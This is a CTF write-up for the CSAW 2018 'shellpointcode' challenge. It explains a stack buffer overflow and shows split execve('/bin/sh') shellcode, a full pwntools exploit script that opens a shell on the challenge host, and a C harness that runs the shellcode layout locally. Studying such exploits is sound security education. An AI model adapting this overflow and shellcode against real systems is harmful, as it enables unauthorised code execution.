Tags: shell 

Rating:

**Description**

> Linked lists are great! They let you chain pieces of data together.
>
> `nc pwn.chal.csaw.io 9005`

**Files provided**

- [`shellpointcode`](https://github.com/Aurel300/empirectf/blob/master/writeups/2018-09-14-CSAW-CTF-Quals/files/shellpointcode)

**Solution** (by [Mem2019](https://github.com/Mem2019))

Put `/bin/sh\x00` into node 1 and split the shellcode between node 2 and the initials buffer. The initials input overflows past the 3-byte buffer and the saved `rbp` into the return address, which is overwritten with the leaked stack pointer (`node.next`), so `ret` lands on the bytes written right after it. Those bytes set up the `execve` arguments and short-jump into node 2, which holds the rest:

```assembly
; part 1: placed right after the overwritten return address
lea rdi,[rsp+0x28]   ; after ret, rsp points just past the return address; node 1's text ("/bin/sh") is 0x28 bytes above
xor rdx,rdx          ; envp = NULL
xor rsi,rsi          ; argv = NULL
jmp short +0x0a      ; eb 0a: the 0x0a is the newline that ends the input line
; part 2: node 2's text, preceded by five 0x41 bytes ("A"); they are REX prefixes,
; ignored in front of push imm8, so the jump does not have to land on an exact byte
push SYS_execve
pop rax
syscall
```
```python
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

g_local = True
if g_local:
    sh = process('./shellpointcode')
    gdb.attach(sh)
else:
    sh = remote("pwn.chal.csaw.io", 9005)

# Part 1 of the shellcode, executed right after the overwritten return address.
# After `ret`, rsp points just past the return address; node 1's text is 0x28 above it.
stage1 = asm("lea rdi,[rsp+0x28]\nxor rdx,rdx\nxor rsi,rsi")

# Part 2, stored in node 2. The leading 0x41 bytes are REX prefixes that are
# ignored in front of `push imm8`, so the short jmp need not land exactly on it.
stage2 = b"A" * 5 + asm("push SYS_execve\npop rax\nsyscall")

sh.recvuntil(b"(15 bytes) Text for node 1: \n")
sh.send(b"/bin/sh\x00\n")                      # node 1: the execve path
sh.recvuntil(b"(15 bytes) Text for node 2: \n")
sh.send(stage2 + b"\n")

# The program prints a stack address (node.next); it becomes the new return address.
sh.recvuntil(b"node.next: 0x")
ret_addr = int(sh.recv(6 * 2), 16)             # 6-byte address, 12 hex digits

# Initials: 3-byte buffer + 8 bytes of saved rbp, then the return address,
# then stage 1 and `jmp short +0x0a` (eb 0a); the 0x0a is the newline ending the line.
sh.recvuntil(b"What are your initials?\n")
sh.send(b"A" * (3 + 8) + p64(ret_addr) + stage1 + b"\xeb\n")
sh.interactive()
```
Node 2 takes the second half and the initials overflow the first half because of the stack layout: from low to high addresses it is the initials buffer, then node 2, then node 1. The overflow writes upward past the return address to where execution resumes, the short jump carries execution forward into node 2's text, and node 1, highest of the three, holds the `/bin/sh` string that `lea rdi,[rsp+0x28]` picks up.
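The same two-stage layout as a local harness, added here as an illustration and not taken from the writeup or the challenge binary: stage 1, a gap, the 0x41 slide plus stage 2, and `/bin/sh` are laid out in one page the way the exploit spreads them over the initials overflow, node 2 and node 1, and the page is then called. The offsets are chosen for the harness, the `lea` is rip-relative because the harness calls the page as a function rather than returning onto the stack, and stage 2 ends in `ret` instead of `syscall` so the result (rax = 59, `SYS_execve`) can be checked instead of spawning a shell. x86-64 Linux only.

```c
/* Harness for the split-shellcode layout (added example, x86-64 only). */
#define _DEFAULT_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

#if defined(__x86_64__)
#define SPLIT_SHELLCODE_EXPECTED 59L   /* SYS_execve on x86-64 Linux */
#else
#define SPLIT_SHELLCODE_EXPECTED -1L   /* run_split_shellcode() refuses to run elsewhere */
#endif

/* Offsets inside the page; chosen for this harness, not taken from the binary. */
enum { STAGE1 = 0, JMP_AT = 11, SLED = 23, STAGE2 = 28, BINSH = 40, TOTAL = 48 };

static size_t build_layout(uint8_t *buf)
{
    static const uint8_t stage1[] = {
        0x48, 0x8d, 0x3d, 0x21, 0x00, 0x00, 0x00, /* lea rdi,[rip+0x21] -> "/bin/sh" at BINSH */
        0x31, 0xd2,                               /* xor edx,edx   envp = NULL */
        0x31, 0xf6,                               /* xor esi,esi   argv = NULL */
        0xeb, 0x0a,                               /* jmp short +10 (0x0a == '\n', as in the exploit) */
    };
    static const uint8_t stage2[] = { 0x6a, 0x3b, 0x58, 0xc3 }; /* push 59 ; pop rax ; ret */

    memset(buf, 0xcc, TOTAL);                     /* int3: landing in a gap would trap */
    memcpy(buf + STAGE1, stage1, sizeof stage1);
    memset(buf + SLED, 0x41, STAGE2 - SLED);      /* five REX prefixes, ignored before push imm8 */
    memcpy(buf + STAGE2, stage2, sizeof stage2);
    memcpy(buf + BINSH, "/bin/sh", 8);            /* includes the terminating NUL */
    return TOTAL;
}

/* Where the short jmp at JMP_AT lands: disp8 is relative to the end of the jmp. */
static int jmp_target(const uint8_t *buf)
{
    return JMP_AT + 2 + (int8_t)buf[JMP_AT + 1];
}

/* Where the rip-relative lea at STAGE1 points: disp32 is relative to the next instruction. */
static int lea_target(const uint8_t *buf)
{
    int32_t disp = (int32_t)((uint32_t)buf[3] | (uint32_t)buf[4] << 8 |
                             (uint32_t)buf[5] << 16 | (uint32_t)buf[6] << 24);
    return STAGE1 + 7 + disp;
}

/* Map the layout, make it executable, call it. Returns rax as left by stage 2. */
static long run_split_shellcode(void)
{
#if defined(__x86_64__)
    const size_t len = 4096;
    uint8_t *page = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -2;
    build_layout(page);
    if (mprotect(page, len, PROT_READ | PROT_EXEC) != 0) { /* W^X: never map RWX */
        munmap(page, len);
        return -3;
    }
    long (*entry)(void) = (long (*)(void))page;
    long rax = entry();                           /* stage 1 -> jmp -> slide -> stage 2 -> ret */
    munmap(page, len);
    return rax;
#else
    return -1;
#endif
}

int main(void)
{
    uint8_t buf[TOTAL];
    build_layout(buf);
    printf("jmp lands at offset %d (slide is %d..%d), lea points at offset %d: \"%s\"\n",
           jmp_target(buf), SLED, STAGE2 - 1, lea_target(buf), (const char *)buf + lea_target(buf));
    long rax = run_split_shellcode();
    printf("stage 2 returned rax = %ld (SYS_execve = 59)\n", rax);
    return rax == SPLIT_SHELLCODE_EXPECTED ? 0 : 1;
}
```

The page is mapped writable, filled, and only then flipped to executable, so the harness itself never needs an RWX mapping; on the real target the stack is executable, which is what makes returning into the overflow bytes possible in the first place.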

Original writeup (https://github.com/Aurel300/empirectf/blob/master/writeups/2018-09-14-CSAW-CTF-Quals/README.md#100-pwn--shell-code).